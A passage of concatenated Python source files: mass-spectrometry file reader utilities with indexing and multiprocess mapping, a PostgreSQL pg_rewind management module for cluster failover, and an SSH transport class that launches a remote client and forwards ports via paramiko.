The slice over the range of indices to retrieve
include_value: bool
Whether to return both the key and the value or just the key.
Defaults to :const:`False`
Returns
-------
list:
If ``include_value`` is :const:`True`, a tuple of (key, value) at ``index``
else just the key at ``index`` for each ``index`` in ``spec``
'''
items = self.index_sequence
return [(k, v) if include_value else k for k, v in items[spec]]
def between(self, start, stop, include_value=False):
keys = list(self)
if start is not None:
try:
start_index = keys.index(start)
except ValueError:
raise KeyError(start)
else:
start_index = 0
if stop is not None:
try:
stop_index = keys.index(stop)
except ValueError:
raise KeyError(stop)
else:
stop_index = len(keys) - 1
if start is None or stop is None:
pass # won't switch indices
else:
start_index, stop_index = min(start_index, stop_index), max(start_index, stop_index)
if include_value:
return [(k, self[k]) for k in keys[start_index:stop_index + 1]]
return keys[start_index:stop_index + 1]
def __repr__(self):
template = "{self.__class__.__name__}({items})"
return template.format(self=self, items=list(self.items()))
def _integrity_check(self):
indices = list(self.values())
sorted_indices = sorted(self.values())
return indices == sorted_indices
def sort(self):
sorted_pairs = sorted(self.items(), key=lambda x: x[1])
self.clear()
self._invalidate()
for key, value in sorted_pairs:
self[key] = value
return self
class IndexSavingTextReader(IndexSavingMixin, IndexedTextReader):
_index_class = OffsetIndex
class HierarchicalOffsetIndex(WritableIndex):
_inner_type = OffsetIndex
def __init__(self, base=None):
self.mapping = defaultdict(self._inner_type)
for key, value in (base or {}).items():
self.mapping[key] = self._inner_type(value)
def _integrity_check(self):
for key, value in self.items():
if not value._integrity_check():
return False
return True
def sort(self):
for key, value in self.items():
value.sort()
return self
def __getitem__(self, key):
return self.mapping[key]
def __setitem__(self, key, value):
self.mapping[key] = value
def __iter__(self):
return iter(self.mapping)
def __len__(self):
return sum(len(group) for key, group in self.items())
def __contains__(self, key):
return key in self.mapping
def find(self, key, element_type=None):
if element_type is None:
for element_type in self.keys():
try:
return self.find(key, element_type)
except KeyError:
continue
raise KeyError(key)
else:
return self[element_type][key]
def find_no_type(self, key):
"""Try to find `key` in each of the lower-level indexes, returning both
value and the element type that match the key."""
for element_type in self.keys():
try:
return self.find(key, element_type), element_type
except KeyError:
continue
raise KeyError(key)
def update(self, *args, **kwargs):
self.mapping.update(*args, **kwargs)
def pop(self, key, default=None):
return self.mapping.pop(key, default)
def keys(self):
return self.mapping.keys()
def values(self):
return self.mapping.values()
def items(self):
return self.mapping.items()
def _serializable_container(self):
encoded_index = {}
container = {
'keys': list(self.keys())
}
for key, offset in self.items():
encoded_index[key] = list(offset.items())
container['index'] = encoded_index
return container
def _make_chain(reader, readername, full_output=False):
def concat_results(*args, **kwargs):
results = [reader(arg, **kwargs) for arg in args]
if pd is not None and all(isinstance(a, pd.DataFrame) for a in args):
return pd.concat(results)
return np.concatenate(results)
def _iter(files, kwargs):
for f in files:
with reader(f, **kwargs) as r:
for item in r:
yield item
def chain(*files, **kwargs):
return _iter(files, kwargs)
def from_iterable(files, **kwargs):
return _iter(files, kwargs)
@contextmanager
def _chain(*files, **kwargs):
yield chain(*files, **kwargs)
@contextmanager
def _from_iterable(files, **kwargs):
yield from_iterable(files, **kwargs)
def dispatch(*args, **kwargs):
return dispatch_from_iterable(args, **kwargs)
def dispatch_from_iterable(args, **kwargs):
if kwargs.get('full_output', full_output):
return concat_results(*args, **kwargs)
return _chain(*args, **kwargs)
dispatch.__doc__ = """Chain :py:func:`{0}` for several files.
Positional arguments should be file names or file objects.
Keyword arguments are passed to the :py:func:`{0}` function.
""".format(readername)
dispatch_from_iterable.__doc__ = """Chain :py:func:`{0}` for several files.
Keyword arguments are passed to the :py:func:`{0}` function.
Parameters
----------
files : iterable
Iterable of file names or file objects.
""".format(readername)
dispatch.from_iterable = dispatch_from_iterable
return dispatch
def _check_use_index(source, use_index, default):
try:
if use_index is not None:
use_index = bool(use_index)
# if a file name is given, do not override anything; short-circuit
if isinstance(source, basestring):
return use_index if use_index is not None else default
# collect information on source
if hasattr(source, 'seekable'):
seekable = source.seekable()
else:
seekable = None
if hasattr(source, 'mode'):
binary = 'b' in source.mode
else:
binary = None
# now check for conflicts
if seekable is False:
if binary:
raise PyteomicsError('Cannot work with non-seekable file in binary mode: {}.'.format(source))
if use_index:
warnings.warn('Cannot use indexing as {} is not seekable. Setting `use_index` to False.'.format(source))
use_index = False
elif binary is not None:
if use_index is not None and binary != use_index:
warnings.warn('use_index is {}, but the file mode is {}. '
'Setting `use_index` to {}'.format(use_index, source.mode, binary))
use_index = binary
else:
warnings.warn('Could not check mode on {}. Specify `use_index` explicitly to avoid errors.'.format(source))
if use_index is not None:
return use_index
return default
except PyteomicsError:
raise
except Exception as e:
warnings.warn('Could not check mode on {}. Reason: {!r}. Specify `use_index` explicitly to avoid errors.'.format(source, e))
if use_index is not None:
return use_index
return default
class FileReadingProcess(mp.Process):
"""Process that does a share of distributed work on entries read from file.
Reconstructs a reader object, parses an entries from given indexes,
optionally does additional processing, sends results back.
The reader class must support the :py:meth:`__getitem__` dict-like lookup.
"""
def __init__(self, reader_spec, target_spec, qin, qout, args_spec, kwargs_spec):
super(FileReadingProcess, self).__init__(name='pyteomics-map-worker')
self.reader_spec = reader_spec
self.target_spec = target_spec
self.args_spec = args_spec
self.kwargs_spec = kwargs_spec
self._qin = qin
self._qout = qout
# self._in_flag = in_flag
self._done_flag = mp.Event()
self.daemon = True
def run(self):
reader = serializer.loads(self.reader_spec)
target = serializer.loads(self.target_spec)
args = serializer.loads(self.args_spec)
kwargs = serializer.loads(self.kwargs_spec)
for key in iter(self._qin.get, None):
item = reader[key]
if target is not None:
result = target(item, *args, **kwargs)
else:
result = item
self._qout.put(result)
self._done_flag.set()
def is_done(self):
return self._done_flag.is_set()
try:
_NPROC = mp.cpu_count()
except NotImplementedError:
_NPROC = 4
_QUEUE_TIMEOUT = 4
_QUEUE_SIZE = int(1e7)
class TaskMappingMixin(NoOpBaseReader):
def __init__(self, *args, **kwargs):
'''
Instantiate a :py:class:`TaskMappingMixin` object, set default parameters for IPC.
Parameters
----------
queue_timeout : float, keyword only, optional
The number of seconds to block, waiting for a result before checking to see if
all workers are done.
queue_size : int, keyword only, optional
The length of IPC queue used.
processes : int, keyword only, optional
Number of worker processes to spawn when :py:meth:`map` is called. This can also be
specified in the :py:meth:`map` call.
'''
self._queue_size = kwargs.pop('queue_size', _QUEUE_SIZE)
self._queue_timeout = kwargs.pop('timeout', _QUEUE_TIMEOUT)
self._nproc = kwargs.pop('processes', _NPROC)
super(TaskMappingMixin, self).__init__(*args, **kwargs)
def _get_reader_for_worker_spec(self):
return self
def _build_worker_spec(self, target, args, kwargs):
serialized = []
for obj, objname in [(self._get_reader_for_worker_spec(), 'reader'), (target, 'target'), (args, 'args'),
(kwargs, 'kwargs')]:
try:
serialized.append(serializer.dumps(obj))
except serializer.PicklingError:
msg = 'Could not serialize {0} {1} with {2.__name__}.'.format(objname, obj, serializer)
if serializer is not dill:
msg += ' Try installing `dill`.'
raise PyteomicsError(msg)
return serialized
def _spawn_workers(self, specifications, in_queue, out_queue, processes):
reader_spec, target_spec, args_spec, kwargs_spec = specifications
workers = []
for _ in range(processes):
worker = FileReadingProcess(
reader_spec, target_spec, in_queue, out_queue, args_spec, kwargs_spec)
workers.append(worker)
return workers
def _spawn_feeder_thread(self, in_queue, iterator, processes):
def feeder():
for key in iterator:
in_queue.put(key)
for _ in range(processes):
in_queue.put(None)
feeder_thread = threading.Thread(target=feeder)
feeder_thread.daemon = True
feeder_thread.start()
return feeder_thread
def map(self, target=None, processes=-1, args=None, kwargs=None, **_kwargs):
"""Execute the ``target`` function over entries of this object across up to ``processes``
processes.
Results will be returned out of order.
Parameters
----------
target : :class:`Callable`, optional
The function to execute over each entry. It will be given a single object yielded by
the wrapped iterator as well as all of the values in ``args`` and ``kwargs``
processes : int, optional
The number of worker processes to use. If 0 or negative,
defaults to the number of available CPUs.
This parameter can also be set at reader creation.
args : :class:`Sequence`, optional
Additional positional arguments to be passed to the target function
kwargs : :class:`Mapping`, optional
Additional keyword arguments to be passed to the target function
**_kwargs
Additional keyword arguments to be passed to the target function
Yields
------
object
The work item returned by the target function.
"""
if self._offset_index is None:
raise PyteomicsError('The reader needs an index for map() calls. Create the reader with `use_index=True`.')
if processes < 1:
processes = self._nproc
iterator = self._task_map_iterator()
if args is None:
args = tuple()
else:
args = tuple(args)
if kwargs is None:
kwargs = dict()
else:
kwargs = dict(kwargs)
kwargs.update(_kwargs)
serialized = self._build_worker_spec(target, args, kwargs)
in_queue = mp.Queue(self._queue_size)
out_queue = mp.Queue(self._queue_size)
workers = self._spawn_workers(serialized, in_queue, out_queue, processes)
feeder_thread = self._spawn_feeder_thread(in_queue, iterator, processes)
for worker in workers:
worker.start()
def iterate():
while True:
try:
result = out_queue.get(True, self._queue_timeout)
yield result
except Empty:
if all(w.is_done() for w in workers):
break
else:
continue
feeder_thread.join()
for worker in workers:
worker.join()
return iterate()
def _task_map_iterator(self):
"""Returns the :class:`Iteratable` to use when dealing work items onto the input IPC
queue used by :meth:`map`
Returns
-------
:class:`Iteratable`
"""
return iter(self._offset_index.keys())
class ChainBase(object):
"""Chain :meth:`sequence_maker` for several sources into a
single iterable. Positional arguments should be sources like
file names or file objects. Keyword arguments are passed to
the :meth:`sequence_maker` function.
Attributes
----------
sources : :class:`Iterable`
Sources for creating new sequences from, such as paths or
file-like objects
kwargs : :class:`Mapping`
Additional arguments used to instantiate each sequence
"""
def __init__(self, *sources, **kwargs):
self.sources = sources
self.kwargs = kwargs
self._iterator = None
@classmethod
def from_iterable(cls, sources, **kwargs):
return cls(*sources, **kwargs)
@classmethod
def _make_chain(cls, sequence_maker):
if isinstance(sequence_maker, type):
tp = type('%sChain' % sequence_maker.__class__.__name__, (cls,), {
'sequence_maker': sequence_maker
})
else:
tp = type('FunctionChain', (cls,), {
'sequence_maker': staticmethod(sequence_maker)
})
return tp
def sequence_maker(self, file):
raise NotImplementedError()
def _create_sequence(self, file):
return self.sequence_maker(file, **self.kwargs)
def _iterate_over_series(self):
for f in self.sources:
with self._create_sequence(f) as r:
for item in r:
yield item
def __enter__(self):
self._iterator = iter(self._iterate_over_series())
return self
def __exit__(self, *args, **kwargs):
self._iterator = None
def __iter__(self):
return self
def __next__(self):
if self._iterator is None:
self._iterator = self._iterate_over_series()
return next(self._iterator)
def next(self):
return self.__next__()
def map(self, target=None, processes=-1, queue_timeout=_QUEUE_TIMEOUT, args=None, kwargs=None, **_kwargs):
"""Execute the ``target`` function over entries of this object across up to ``processes``
processes.
Results will be returned out of order.
Parameters
----------
target : :class:`Callable`, optional
The function to execute over each entry. It will be given a single object yielded by
the wrapped iterator as well as all of the values in ``args`` and ``kwargs``
processes : int, optional
The number of worker processes to use. If negative, the number of processes
will match the number of available CPUs.
queue_timeout : float, optional
The number of seconds to block, waiting for a result before checking to see if
all workers are done.
args : :class:`Sequence`, optional
Additional positional arguments to be passed to the target function
kwargs : :class:`Mapping`, optional
Additional keyword arguments to be passed to the target function
**_kwargs
Additional keyword arguments to be passed to the target function
Yields
------
object
The work item returned by the target function.
"""
for f in self.sources:
with self._create_sequence(f) as r:
for result in r.map(target, processes, queue_timeout, args, kwargs, **_kwargs):
yield result
class TableJoiner(ChainBase):
def concatenate(self, results):
if pd is not None and all(isinstance(a, pd.DataFrame) for a in results):
return pd.concat(results)
if isinstance(results[0], np.ndarray):
return np.concatenate(results)
else:
return np.array([b for a in results for b in a])
def _iterate_over_series(self):
results = [self._create_sequence(f) for f in self.sources]
return self.concatenate(results)
|
rewind.py | import logging
import os
import shlex
import six
import subprocess
from threading import Lock, Thread
from .connection import get_connection_cursor
from .misc import format_lsn, parse_history, parse_lsn
from ..async_executor import CriticalTask
from ..dcs import Leader
logger = logging.getLogger(__name__)
REWIND_STATUS = type('Enum', (), {'INITIAL': 0, 'CHECKPOINT': 1, 'CHECK': 2, 'NEED': 3,
'NOT_NEED': 4, 'SUCCESS': 5, 'FAILED': 6})
class Rewind(object):
def __init__(self, postgresql):
self._postgresql = postgresql
self._checkpoint_task_lock = Lock()
self.reset_state()
@staticmethod
def configuration_allows_rewind(data):
return data.get('wal_log_hints setting', 'off') == 'on' or data.get('Data page checksum version', '0') != '0'
@property
def can_rewind(self):
""" check if pg_rewind executable is there and that pg_controldata indicates
we have either wal_log_hints or checksums turned on
"""
# low-hanging fruit: check if pg_rewind configuration is there
if not self._postgresql.config.get('use_pg_rewind'):
return False
cmd = [self._postgresql.pgcommand('pg_rewind'), '--help']
try:
ret = subprocess.call(cmd, stdout=open(os.devnull, 'w'), stderr=subprocess.STDOUT)
if ret != 0: # pg_rewind is not there, close up the shop and go home
return False
except OSError:
return False
return self.configuration_allows_rewind(self._postgresql.controldata())
@property
def can_rewind_or_reinitialize_allowed(self):
return self._postgresql.config.get('remove_data_directory_on_diverged_timelines') or self.can_rewind
def trigger_check_diverged_lsn(self):
if self.can_rewind_or_reinitialize_allowed and self._state != REWIND_STATUS.NEED:
self._state = REWIND_STATUS.CHECK
@staticmethod
def check_leader_is_not_in_recovery(conn_kwargs):
try:
with get_connection_cursor(connect_timeout=3, options='-c statement_timeout=2000', **conn_kwargs) as cur:
cur.execute('SELECT pg_catalog.pg_is_in_recovery()')
if not cur.fetchone()[0]:
return True
logger.info('Leader is still in_recovery and therefore can\'t be used for rewind')
except Exception:
return logger.exception('Exception when working with leader')
def _get_checkpoint_end(self, timeline, lsn):
"""The checkpoint record size in WAL depends on postgres major version and platform (memory alignment).
Hence, the only reliable way to figure out where it ends, read the record from file with the help of pg_waldump
and parse the output. We are trying to read two records, and expect that it will fail to read the second one:
`pg_waldump: fatal: error in WAL record at 0/182E220: invalid record length at 0/182E298: wanted 24, got 0`
The error message contains information about LSN of the next record, which is exactly where checkpoint ends."""
lsn8 = format_lsn(lsn, True)
lsn = format_lsn(lsn)
out, err = self._postgresql.waldump(timeline, lsn, 2)
if out is not None and err is not None:
out = out.decode('utf-8').rstrip().split('\n')
err = err.decode('utf-8').rstrip().split('\n')
pattern = 'error in WAL record at {0}: invalid record length at '.format(lsn)
if len(out) == 1 and len(err) == 1 and ', lsn: {0}, prev '.format(lsn8) in out[0] and pattern in err[0]:
i = err[0].find(pattern) + len(pattern)
j = err[0].find(": wanted ", i)
if j > -1:
try:
return parse_lsn(err[0][i:j])
except Exception as e:
logger.error('Failed to parse lsn %s: %r', err[0][i:j], e)
logger.error('Failed to parse pg_%sdump output', self._postgresql.wal_name)
logger.error(' stdout=%s', '\n'.join(out))
logger.error(' stderr=%s', '\n'.join(err))
return 0
def _get_local_timeline_lsn_from_controldata(self):
in_recovery = timeline = lsn = None
data = self._postgresql.controldata()
try:
if data.get('Database cluster state') == 'shut down in recovery':
in_recovery = True
lsn = data.get('Minimum recovery ending location')
timeline = int(data.get("Min recovery ending loc's timeline"))
if lsn == '0/0' or timeline == 0: # it was a master when it crashed
data['Database cluster state'] = 'shut down'
if data.get('Database cluster state') == 'shut down':
in_recovery = False
lsn = data.get('Latest checkpoint location')
timeline = int(data.get("Latest checkpoint's TimeLineID"))
except (TypeError, ValueError):
logger.exception('Failed to get local timeline and lsn from pg_controldata output')
if lsn is not None:
try:
lsn = parse_lsn(lsn)
except (IndexError, ValueError) as e:
logger.error('Exception when parsing lsn %s: %r', lsn, e)
lsn = None
return in_recovery, timeline, lsn
def _get_local_timeline_lsn(self):
if self._postgresql.is_running(): # if postgres is running - get timeline from replication connection
in_recovery = True
timeline = self._postgresql.received_timeline() or self._postgresql.get_replica_timeline()
lsn = self._postgresql.replayed_location()
else: # otherwise analyze pg_controldata output
in_recovery, timeline, lsn = self._get_local_timeline_lsn_from_controldata()
log_lsn = format_lsn(lsn) if isinstance(lsn, six.integer_types) else lsn
logger.info('Local timeline=%s lsn=%s', timeline, log_lsn)
return in_recovery, timeline, lsn
@staticmethod
def _log_master_history(history, i):
start = max(0, i - 3)
end = None if i + 4 >= len(history) else i + 2
history_show = []
def format_history_line(line):
return '{0}\t{1}\t{2}'.format(line[0], format_lsn(line[1]), line[2])
for line in history[start:end]:
history_show.append(format_history_line(line))
if line != history[-1]:
history_show.append('...')
history_show.append(format_history_line(history[-1]))
logger.info('master: history=%s', '\n'.join(history_show))
def _conn_kwargs(self, member, auth):
ret = member.conn_kwargs(auth)
if not ret.get('dbname'):
ret['dbname'] = self._postgresql.database
# Add target_session_attrs in case more than one hostname is specified
# (libpq client-side failover) making sure we hit the primary
if 'target_session_attrs' not in ret and self._postgresql.major_version >= 100000:
ret['target_session_attrs'] = 'read-write'
return ret
def _check_timeline_and_lsn(self, leader):
in_recovery, local_timeline, local_lsn = self._get_local_timeline_lsn()
if local_timeline is None or local_lsn is None:
return
if isinstance(leader, Leader) and leader.member.data.get('role') != 'master':
return
if not self.check_leader_is_not_in_recovery(
self._conn_kwargs(leader, self._postgresql.config.replication)):
return
history = need_rewind = None
try:
with self._postgresql.get_replication_connection_cursor(**leader.conn_kwargs()) as cur:
cur.execute('IDENTIFY_SYSTEM')
master_timeline = cur.fetchone()[1]
logger.info('master_timeline=%s', master_timeline)
if local_timeline > master_timeline: # Not always supported by pg_rewind
need_rewind = True
elif local_timeline == master_timeline:
need_rewind = False
elif master_timeline > 1:
cur.execute('TIMELINE_HISTORY {0}'.format(master_timeline))
history = cur.fetchone()[1]
if not isinstance(history, six.string_types):
history = bytes(history).decode('utf-8')
logger.debug('master: history=%s', history)
except Exception:
return logger.exception('Exception when working with master via replication connection')
if history is not None:
history = list(parse_history(history))
for i, (parent_timeline, switchpoint, _) in enumerate(history):
if parent_timeline == local_timeline:
# We don't need to rewind when:
# 1. for replica: replayed location is not ahead of switchpoint
# 2. for the former primary: end of checkpoint record is the same as switchpoint
if in_recovery:
need_rewind = local_lsn > switchpoint
elif local_lsn >= switchpoint:
need_rewind = True
else:
need_rewind = switchpoint != self._get_checkpoint_end(local_timeline, local_lsn)
elif parent_timeline > local_timeline:
need_rewind = True
break
else:
need_rewind = True
self._log_master_history(history, i)
self._state = need_rewind and REWIND_STATUS.NEED or REWIND_STATUS.NOT_NEED
def rewind_or_reinitialize_needed_and_possible(self, leader):
if leader and leader.name != self._postgresql.name and leader.conn_url and self._state == REWIND_STATUS.CHECK:
self._check_timeline_and_lsn(leader)
return leader and leader.conn_url and self._state == REWIND_STATUS.NEED
def __checkpoint(self, task, wakeup):
try:
result = self._postgresql.checkpoint()
except Exception as e:
result = 'Exception: ' + str(e)
with task:
task.complete(not bool(result))
if task.result:
wakeup()
def ensure_checkpoint_after_promote(self, wakeup):
"""After promote issue a CHECKPOINT from a new thread and asynchronously check the result.
In case if CHECKPOINT failed, just check that timeline in pg_control was updated."""
if self._state == REWIND_STATUS.INITIAL and self._postgresql.is_leader():
with self._checkpoint_task_lock:
if self._checkpoint_task:
with self._checkpoint_task:
if self._checkpoint_task.result is not None:
self._state = REWIND_STATUS.CHECKPOINT
self._checkpoint_task = None
elif self._postgresql.get_master_timeline() == self._postgresql.pg_control_timeline():
self._state = REWIND_STATUS.CHECKPOINT
else:
self._checkpoint_task = CriticalTask()
Thread(target=self.__checkpoint, args=(self._checkpoint_task, wakeup)).start()
def checkpoint_after_promote(self):
return self._state == REWIND_STATUS.CHECKPOINT
def _fetch_missing_wal(self, restore_command, wal_filename):
cmd = ''
length = len(restore_command)
i = 0
while i < length:
if restore_command[i] == '%' and i + 1 < length:
i += 1
if restore_command[i] == 'p':
cmd += os.path.join(self._postgresql.wal_dir, wal_filename)
elif restore_command[i] == 'f':
cmd += wal_filename
elif restore_command[i] == 'r':
cmd += '000000010000000000000001'
elif restore_command[i] == '%':
cmd += '%'
else:
cmd += '%'
i -= 1
else:
cmd += restore_command[i]
i += 1
logger.info('Trying to fetch the missing wal: %s', cmd)
return self._postgresql.cancellable.call(shlex.split(cmd)) == 0
def _find_missing_wal(self, data):
# could not open file "$PGDATA/pg_wal/0000000A00006AA100000068": No such file or directory
pattern = 'could not open file "'
for line in data.decode('utf-8').split('\n'):
b = line.find(pattern)
if b > -1:
b += len(pattern)
e = line.find('": ', b)
if e > -1 and '/' in line[b:e]:
waldir, wal_filename = line[b:e].rsplit('/', 1)
if waldir.endswith('/pg_' + self._postgresql.wal_name) and len(wal_filename) == 24:
return wal_filename
def pg_rewind(self, r):
# prepare pg_rewind connection
env = self._postgresql.config.write_pgpass(r)
env.update(LANG='C', LC_ALL='C', PGOPTIONS='-c statement_timeout=0')
dsn = self._postgresql.config.format_dsn(r, True)
logger.info('running pg_rewind from %s', dsn)
restore_command = self._postgresql.config.get('recovery_conf', {}).get('restore_command') \
if self._postgresql.major_version < 120000 else self._postgresql.get_guc_value('restore_command')
cmd = [self._postgresql.pgcommand('pg_rewind')]
if self._postgresql.major_version >= 130000 and restore_command:
cmd.append('--restore-target-wal')
cmd.extend(['-D', self._postgresql.data_dir, '--source-server', dsn])
while True:
results = {}
ret = self._postgresql.cancellable.call(cmd, env=env, communicate=results)
logger.info('pg_rewind exit code=%s', ret)
if ret is None:
return False
logger.info(' stdout=%s', results['stdout'].decode('utf-8'))
logger.info(' stderr=%s', results['stderr'].decode('utf-8'))
if ret == 0:
return True
if not restore_command or self._postgresql.major_version >= 130000:
return False
missing_wal = self._find_missing_wal(results['stderr']) or self._find_missing_wal(results['stdout'])
if not missing_wal:
return False
if not self._fetch_missing_wal(restore_command, missing_wal):
logger.info('Failed to fetch WAL segment %s required for pg_rewind', missing_wal)
return False
def execute(self, leader):
if self._postgresql.is_running() and not self._postgresql.stop(checkpoint=False):
return logger.warning('Can not run pg_rewind because postgres is still running')
# prepare pg_rewind connection
r = self._conn_kwargs(leader, self._postgresql.config.rewind_credentials)
# 1. make sure that we are really trying to rewind from the master
# 2. make sure that pg_control contains the new timeline by:
# running a checkpoint or
# waiting until Patroni on the master will expose checkpoint_after_promote=True
checkpoint_status = leader.checkpoint_after_promote if isinstance(leader, Leader) else None
if checkpoint_status is None: # master still runs the old Patroni
leader_status = self._postgresql.checkpoint(self._conn_kwargs(leader, self._postgresql.config.superuser))
if leader_status:
return logger.warning('Can not use %s for rewind: %s', leader.name, leader_status)
elif not checkpoint_status:
return logger.info('Waiting for checkpoint on %s before rewind', leader.name)
elif not self.check_leader_is_not_in_recovery(r):
return
if self.pg_rewind(r):
self._state = REWIND_STATUS.SUCCESS
elif not self.check_leader_is_not_in_recovery(r):
logger.warning('Failed to rewind because master %s become unreachable', leader.name)
else:
logger.error('Failed to rewind from healty master: %s', leader.name)
for name in ('remove_data_directory_on_rewind_failure', 'remove_data_directory_on_diverged_timelines'):
if self._postgresql.config.get(name):
logger.warning('%s is set. removing...', name)
self._postgresql.remove_data_directory()
self._state = REWIND_STATUS.INITIAL
break
else:
self._state = REWIND_STATUS.FAILED
return False
def reset_state(self):
self._state = REWIND_STATUS.INITIAL
with self._checkpoint_task_lock:
self._checkpoint_task = None
@property
def is_needed(self):
return self._state in (REWIND_STATUS.CHECK, REWIND_STATUS.NEED)
@property
def executed(self):
return self._state > REWIND_STATUS.NOT_NEED
@property
def failed(self):
return self._state == REWIND_STATUS.FAILED
def read_postmaster_opts(self):
"""returns the list of option names/values from postgres.opts, Empty dict if read failed or no file"""
result = {}
try:
with open(os.path.join(self._postgresql.data_dir, 'postmaster.opts')) as f:
data = f.read()
for opt in data.split('" "'):
if '=' in opt and opt.startswith('--'):
name, val = opt.split('=', 1)
result[name.strip('-')] = val.rstrip('"\n')
except IOError:
logger.exception('Error when reading postmaster.opts')
return result
def single_user_mode(self, communicate=None, options=None):
"""run a given command in a single-user mode. If the command is empty - then just start and stop"""
cmd = [self._postgresql.pgcommand('postgres'), '--single', '-D', self._postgresql.data_dir]
for opt, val in sorted((options or {}).items()):
cmd.extend(['-c', '{0}={1}'.format(opt, val)])
# need a database name to connect
cmd.append('template1')
return self._postgresql.cancellable.call(cmd, communicate=communicate)
def cleanup_archive_status(self):
status_dir = os.path.join(self._postgresql.wal_dir, 'archive_status')
try:
for f in os.listdir(status_dir):
path = os.path.join(status_dir, f)
try:
if os.path.islink(path):
os.unlink(path)
elif os.path.isfile(path):
os.remove(path)
except OSError:
logger.exception('Unable to remove %s', path)
except OSError:
logger.exception('Unable to list %s', status_dir)
def ensure_clean_shutdown(self):
self.cleanup_archive_status()
# Start in a single user mode and stop to produce a clean shutdown
opts = self.read_postmaster_opts()
opts.update({'archive_mode': 'on', 'archive_command': 'false'})
self._postgresql.config.remove_recovery_conf()
output = {}
ret = self.single_user_mode(communicate=output, options=opts)
if ret != 0:
logger.error('Crash recovery finished with code=%s', ret)
logger.info(' stdout=%s', output['stdout'].decode('utf-8'))
logger.info(' stderr=%s', output['stderr'].decode('utf-8'))
return ret == 0 or None
|
ssh.py | import logging
from io import StringIO
import select
import xmlrpc.client
from socketserver import BaseRequestHandler, ThreadingTCPServer
from threading import Thread
from time import sleep
import paramiko
from finorch.config.config import api_config_manager
from finorch.transport.abstract_transport import AbstractTransport
from finorch.transport.exceptions import TransportConnectionException, TransportTerminateException, \
TransportGetJobFileException, TransportGetJobFileListException, TransportGetJobStatusException
class SshTransport(AbstractTransport):
def __init__(self, session, exec_path, *args, **kwargs):
super().__init__(session, exec_path, *args, **kwargs)
# exec path must exist for ssh session
assert exec_path
self._ssh_transport = None
self._ssh_session = None
self._host = kwargs['host']
self._username = kwargs['username']
self._ssh_password = kwargs.get('password', None)
self._python_path = kwargs['python_path']
self._env_file = kwargs.get('env_file', None)
self._callsign = kwargs['callsign']
self._ssh_port = kwargs.get('ssh_port', 22)
self._remote_port = None
from finorch.sessions import SshSession
self._is_generic = isinstance(self._session, SshSession)
self._ssh_client = paramiko.SSHClient()
self._ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
def connect(self, *args, **kwargs):
self._remote_port = kwargs['remote_port']
self._remote_port = int(self._remote_port) if self._remote_port else None
# If no ssh password is provided, then try to use the key from the api settings
if not self._ssh_password:
# Get the configuration for the specified session
section = api_config_manager.get_section(self._callsign)
if not section:
raise TransportConnectionException("No password provided, and no key set")
# Check if it has a key or not
key = section.get('key' if not self._is_generic else self._host, None)
if not key:
raise TransportConnectionException("No password provided, and no key set")
skey = StringIO(key)
pkey = paramiko.RSAKey.from_private_key(skey)
# Set up a connection to the remote server using username and key
self._ssh_client.connect(
hostname=self._host,
port=self._ssh_port,
username=self._username,
pkey=pkey,
)
else:
# Set up a connection to the remote server using username and password
self._ssh_client.connect(
hostname=self._host,
port=self._ssh_port,
username=self._username,
password=self._ssh_password
)
# Get the transport used by the client
self._ssh_transport = self._ssh_client.get_transport()
# First try to reconnect the previous port if it's set
if self._remote_port:
try:
# Set up the ssh port forwarding
self._forward_tunnel()
# Connect the client rpc
self._client_rpc = xmlrpc.client.ServerProxy(
f'http://localhost:{self._port}/rpc',
allow_none=True,
use_builtin_types=True
)
self._client_rpc.system.listMethods()
# We're connected
self._connected = True
return self._remote_port
except Exception:
# Remote client is dead or invalid
self._connection.server_close()
self._connected = False
# Remote client isn't running, start the remote client
session = self._ssh_transport.open_channel("session")
# Always try to make the execution directory and change to it
command = f"bash --login -c \"mkdir -p {self.exec_path} && cd {self.exec_path} && "
if self._env_file:
command += f"source {self._env_file} && "
command += f"{self._python_path} -m finorch.client.client {self._callsign}\""
# Run the command to start the remote client
logging.info(f"Executing command: {command}")
session.exec_command(command)
# Wait for the connection to close
stdout, stderr = '', ''
while True: # monitoring process
# Reading from output streams
while session.recv_ready():
stdout += session.recv(1000).decode('utf-8')
while session.recv_stderr_ready():
stderr += session.recv_stderr(1000).decode('utf-8')
if session.exit_status_ready(): # If completed
break
sleep(0.1)
if stdout.splitlines() and stdout.splitlines()[-1] == "=EOF=":
break
# Check that the command finished successfully
if session.exit_status_ready() and session.exit_status:
raise TransportConnectionException(
f"Unable to start remote server.\nstdout:\n{stdout}\n\nstderr:\n{stderr}\n"
)
# Finished with the session now
session.close()
# Parse the remote stdout
stdout = stdout.splitlines()
# Check if the client started successfully
if stdout[0] == "error":
# Report the error from the client
raise TransportConnectionException('\n'.join(stdout[1:]))
# Try to parse the first line of the output from the client as the port it is running on
try:
self._remote_port = int(stdout[0])
except ValueError:
raise TransportConnectionException(f"Unable to parse the port. Got {stdout[0]}")
# Set up the ssh port forwarding
self._forward_tunnel()
# Connect the client rpc
self._client_rpc = xmlrpc.client.ServerProxy(
f'http://localhost:{self._port}/rpc',
allow_none=True,
use_builtin_types=True
)
self._client_rpc.set_exec_path(self.exec_path)
# We're connected
self._connected = True
return self._remote_port
def disconnect(self):
super().disconnect()
self._connection.shutdown()
self._ssh_client.close()
self._connected = False
def get_job_file(self, job_identifier, file_path):
status = self._client_rpc.get_job_file(job_identifier, file_path)
if type(status) is bytes:
return status
else:
raise TransportGetJobFileException(status[1])
def get_job_file_list(self, job_identifier):
status = self._client_rpc.get_job_file_list(job_identifier)
if type(status) is list and status[0] is not None:
return status
else:
raise TransportGetJobFileListException(status[1])
def get_job_status(self, job_identifier):
status = self._client_rpc.get_job_status(job_identifier)
if type(status) is int:
return status
else:
raise TransportGetJobStatusException(status[1])
def get_jobs(self):
return self._client_rpc.get_jobs()
def start_job(self, katscript):
return self._client_rpc.start_job(katscript)
def stop_job(self, job_identifier):
return self._client_rpc.stop_job(job_identifier)
def terminate(self):
if not self._connected:
raise TransportTerminateException("Client is not connected")
self._client_rpc.terminate()
self._connected = False
"""
SSH supporting code. Adapted from the following:-
https://github.com/paramiko/paramiko/blob/main/demos/forward.py
https://stackoverflow.com/questions/11294919/port-forwarding-with-paramiko
"""
class SshForwardServer(ThreadingTCPServer):
daemon_threads = True
allow_reuse_address = True
class SshHandler(BaseRequestHandler):
chain_host = None
chain_port = None
ssh_transport = None
def handle(self):
try:
chan = self.ssh_transport.open_channel(
"direct-tcpip",
(self.chain_host, self.chain_port),
self.request.getpeername(),
)
except Exception as e:
logging.error(
"Incoming request to %s:%d failed: %s"
